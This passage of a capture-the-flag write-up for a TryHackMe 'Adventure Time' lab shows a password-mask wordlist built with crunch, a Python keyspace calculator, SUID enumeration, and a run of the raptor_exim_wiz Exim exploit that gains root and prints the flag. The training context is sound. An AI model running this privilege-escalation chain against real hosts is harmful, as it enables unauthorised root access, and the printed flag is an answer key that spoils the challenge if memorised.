but instead I saw that cowering little puppet from the Ice King.....gunter.
What was he up to, I don't know.
But I saw him sneaking in the secret lab of Princess Bubblegum.
To be able to see what he was doing I used my spell 'the evil eye' and saw him.
He was hacking the secret laptop with something small like a duck of rubber.
I had to look closely, but I think I saw him type in something.
It was unclear, but it was something like 'The Ice King s????'.
The last 4 letters where a blur.

Should I tell princess Bubblegum or see how this all plays out?
I don't know....... 
root@lab:~/THM/AdventureTime# crunch 18 18 -t 'The Ice King s@@@@' > wordlist.txt
Crunch will now generate the following amount of data: 8682544 bytes
8 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 456976
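
The same keyspace worked out in Python, as an added example that is not from the write-up: a crunch `@` placeholder stands for one lowercase letter, so four unknown positions give 26^4 candidates, and at 18 characters plus a newline per line that is exactly the 8682544 bytes crunch reports. The generator reproduces the list; the counting function is the part a defender wants, because it shows how little a "blurred" suffix protects once the rest of a password is known.

```python
import itertools
import string


def keyspace(pattern: str, placeholder: str = "@",
             charset: str = string.ascii_lowercase) -> tuple:
    """Number of candidates for a crunch-style pattern and the size of the resulting
    wordlist in bytes (each line is the pattern length plus one newline)."""
    unknown = pattern.count(placeholder)
    count = len(charset) ** unknown
    size_bytes = count * (len(pattern) + 1)
    return count, size_bytes


def expand_mask(pattern: str, placeholder: str = "@",
                charset: str = string.ascii_lowercase):
    """Yield every candidate: fixed characters stay, each placeholder takes one charset symbol,
    in the same lexicographic order crunch uses (first 'aaaa', last 'zzzz')."""
    slots = [i for i, c in enumerate(pattern) if c == placeholder]
    chars = list(pattern)
    for combo in itertools.product(charset, repeat=len(slots)):
        for i, c in zip(slots, combo):
            chars[i] = c
        yield "".join(chars)


def bits_of_entropy(pattern: str, placeholder: str = "@",
                    charset: str = string.ascii_lowercase) -> float:
    """How much uncertainty is actually left in the password, in bits."""
    import math
    count, _ = keyspace(pattern, placeholder, charset)
    return math.log2(count)


if __name__ == "__main__":
    pattern = "The Ice King s@@@@"       # the pattern used with crunch above
    count, size = keyspace(pattern)
    print(f"{count} candidates, {size} bytes, {bits_of_entropy(pattern):.1f} bits of entropy")
    print(next(expand_mask(pattern)))   # The Ice King saaaa
```

Eighteen characters sound like a strong passphrase, but with fourteen of them written down the remaining search space is under 19 bits, small enough that the only sensible response on the defending side is to treat the password as already compromised.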

peppermint-butler@at:~$ su gunter
Password: 
gunter@at:~$ id
uid=1007(gunter) gid=1007(gunter) groups=1007(gunter),1012(gcc)
gunter@at:~$ ss -tupan
Netid              State                Recv-Q               Send-Q                                  Local Address:Port                                   Peer Address:Port                
udp                UNCONN               0                    0                                             0.0.0.0:631                                         0.0.0.0:*                   
udp                UNCONN               0                    0                                       127.0.0.53%lo:53                                          0.0.0.0:*                   
udp                UNCONN               0                    0                                             0.0.0.0:68                                          0.0.0.0:*                   
udp                UNCONN               0                    0                                             0.0.0.0:35972                                       0.0.0.0:*                   
udp                UNCONN               0                    0                                             0.0.0.0:5353                                        0.0.0.0:*                   
udp                UNCONN               0                    0                                                [::]:46415                                          [::]:*                   
udp                UNCONN               0                    0                                                [::]:5353                                           [::]:*                   
tcp                LISTEN               0                    128                                     127.0.0.53%lo:53                                          0.0.0.0:*                   
tcp                LISTEN               0                    128                                           0.0.0.0:22                                          0.0.0.0:*                   
tcp                LISTEN               0                    5                                           127.0.0.1:631                                         0.0.0.0:*                   
tcp                LISTEN               0                    20                                          127.0.0.1:60000                                       0.0.0.0:*                   
tcp                LISTEN               0                    25                                            0.0.0.0:31337                                       0.0.0.0:*                   
tcp                LISTEN               0                    80                                          127.0.0.1:3306                                        0.0.0.0:*                   
tcp                ESTAB                0                    0                                     192.168.245.132:22                                  192.168.245.129:52778               
tcp                LISTEN               0                    128                                                 *:80                                                *:*                   
tcp                LISTEN               0                    32                                                  *:21                                                *:*                   
tcp                LISTEN               0                    128                                              [::]:22                                             [::]:*                   
tcp                LISTEN               0                    5                                               [::1]:631                                            [::]:*                   
tcp                LISTEN               0                    128                                                 *:443                                               *:*
gunter@at:~$ find / -perm /4000 -type f 2>/dev/null
/usr/sbin/pppd
/usr/sbin/exim4
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/xorg/Xorg.wrap
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/arping
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/traceroute6.iputils
/usr/bin/vmware-user-suid-wrapper
/usr/bin/sudo
/bin/ping
/bin/umount
/bin/su
/bin/fusermount
/bin/mount

The exploit script targets port 25, but on this box the SMTP listener is on 127.0.0.1:60000 (see the ss output above), so change port 25 to 60000 in the script before running it.

root@lab:~/THM/AdventureTime# scp exim.sh gunter@adventure-time.com:/home/gunter/
gunter@adventure-time.com's password: 
exim.sh
gunter@at:~$ bash exim.sh

raptor_exim_wiz - "The Return of the WIZard" LPE exploit
Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>

Preparing setuid shell helper...

Delivering setuid payload...
220 at ESMTP Exim 4.90_1 Ubuntu Mon, 23 Sep 2019 20:12:32 +0200
250 at Hello localhost [127.0.0.1]
250 OK
250 Accepted
354 Enter message, ending with "." on a line by itself
250 OK id=1iCSp6-00015g-FT
221 at closing connection

Waiting 5 seconds...
-rwsr-xr-x 1 root gunter 8504 sep 23 20:12 /tmp/pwned
# id
uid=0(root) gid=0(root) groups=0(root),1007(gunter),1012(gcc)
# bash
root@at:~# cd /home/bubblegum/
root@at:/home/bubblegum# ls -lah
total 120K
drwxr-x--- 18 bubblegum bubblegum 4,0K sep 23 13:57 .
drwxr-xr-x 10 root      root      4,0K sep 20 20:53 ..
-rw-------  1 bubblegum bubblegum  725 sep 23 13:57 .bash_history
-rw-r--r--  1 bubblegum bubblegum  220 apr  4  2018 .bash_logout
-rw-r--r--  1 bubblegum bubblegum 3,7K apr  4  2018 .bashrc
drwx------ 15 bubblegum bubblegum 4,0K sep 20 17:15 .cache
drwx------ 12 bubblegum bubblegum 4,0K sep 20 08:45 .config
drwxr-xr-x  2 bubblegum bubblegum 4,0K sep 18 19:39 Desktop
drwxr-xr-x  2 bubblegum bubblegum 4,0K sep 18 19:39 Documents
drwxr-xr-x  2 bubblegum bubblegum 4,0K sep 18 19:39 Downloads
drwx------  3 bubblegum bubblegum 4,0K sep 18 19:40 .gnupg
-rw-------  1 bubblegum bubblegum 3,6K sep 23 13:39 .ICEauthority
drwx------  3 bubblegum bubblegum 4,0K sep 18 19:39 .local
drwx------  5 bubblegum bubblegum 4,0K sep 18 21:20 .mozilla
drwxr-xr-x  2 bubblegum bubblegum 4,0K sep 18 19:39 Music
-rw-------  1 root      root       183 sep 18 21:11 .mysql_history
drwxrwxr-x  3 bubblegum bubblegum 4,0K sep 20 19:26 nmap
drwxr-xr-x  2 bubblegum bubblegum 4,0K sep 18 19:39 Pictures
-rw-r--r--  1 bubblegum bubblegum  807 apr  4  2018 .profile
drwxr-xr-x  2 bubblegum bubblegum 4,0K sep 18 19:39 Public
drwxrwxr-x  2 bubblegum bubblegum 4,0K sep 22 10:54 Secrets
-rwxrwx---  1 bubblegum bubblegum 1,6K sep 21 14:41 secretServer.py
drwx------  2 bubblegum bubblegum 4,0K sep 18 19:40 .ssh
drwxr-xr-x  2 bubblegum bubblegum 4,0K sep 18 19:39 Templates
drwxr-xr-x  2 bubblegum bubblegum 4,0K sep 18 19:39 Videos
-rw-------  1 root      root       13K sep 23 13:46 .viminfo
-rw-rw-r--  1 bubblegum bubblegum  163 sep 20 19:26 .wget-hsts
root@at:/home/bubblegum# cd Secrets/
root@at:/home/bubblegum/Secrets# ls -lah
total 12K
drwxrwxr-x  2 bubblegum bubblegum 4,0K sep 22 10:54 .
drwxr-x--- 18 bubblegum bubblegum 4,0K sep 23 13:57 ..
-rw-r-----  1 bubblegum bubblegum 3,1K sep 22 10:54 bmo.txt
root@at:/home/bubblegum/Secrets# cat bmo.txt 



░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
░░░░▄██████████████████████▄░░░░
░░░░█░░░░░░░░░░░░░░░░░░░░░░█░░░░
░░░░█░▄██████████████████▄░█░░░░
░░░░█░█░░░░░░░░░░░░░░░░░░█░█░░░░
░░░░█░█░░░░░░░░░░░░░░░░░░█░█░░░░
░░░░█░█░░█░░░░░░░░░░░░█░░█░█░░░░
░░░░█░█░░░░░▄▄▄▄▄▄▄▄░░░░░█░█░░░░
░░░░█░█░░░░░▀▄░░░░▄▀░░░░░█░█░░░░
░░░░█░█░░░░░░░▀▀▀▀░░░░░░░█░█░░░░
░░░░█░█░░░░░░░░░░░░░░░░░░█░█░░░░
░█▌░█░▀██████████████████▀░█░▐█░
░█░░█░░░░░░░░░░░░░░░░░░░░░░█░░█░
░█░░█░████████████░░░░░██░░█░░█░
░█░░█░░░░░░░░░░░░░░░░░░░░░░█░░█░
░█░░█░░░░░░░░░░░░░░░▄░░░░░░█░░█░
░▀█▄█░░░▐█▌░░░░░░░▄███▄░██░█▄█▀░
░░░▀█░░█████░░░░░░░░░░░░░░░█▀░░░
░░░░█░░░▐█▌░░░░░░░░░▄██▄░░░█░░░░
░░░░█░░░░░░░░░░░░░░▐████▌░░█░░░░
░░░░█░▄▄▄░▄▄▄░░░░░░░▀██▀░░░█░░░░
░░░░█░░░░░░░░░░░░░░░░░░░░░░█░░░░
░░░░▀██████████████████████▀░░░░
░░░░░░░░██░░░░░░░░░░░░██░░░░░░░░
░░░░░░░░██░░░░░░░░░░░░██░░░░░░░░
░░░░░░░░██░░░░░░░░░░░░██░░░░░░░░
░░░░░░░░██░░░░░░░░░░░░██░░░░░░░░
░░░░░░░▐██░░░░░░░░░░░░██▌░░░░░░░
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░


Secret project number: 211243A
Name opbject: BMO
Rol object: Spy

In case of emergency use resetcode: tryhackme{Th1s1s4c0d3F0rBM0}


-------

Good job on getting this code!!!!
You solved all the puzzles and tried harder to the max.
If you liked this CTF, give a shout out to @n0w4n.


 
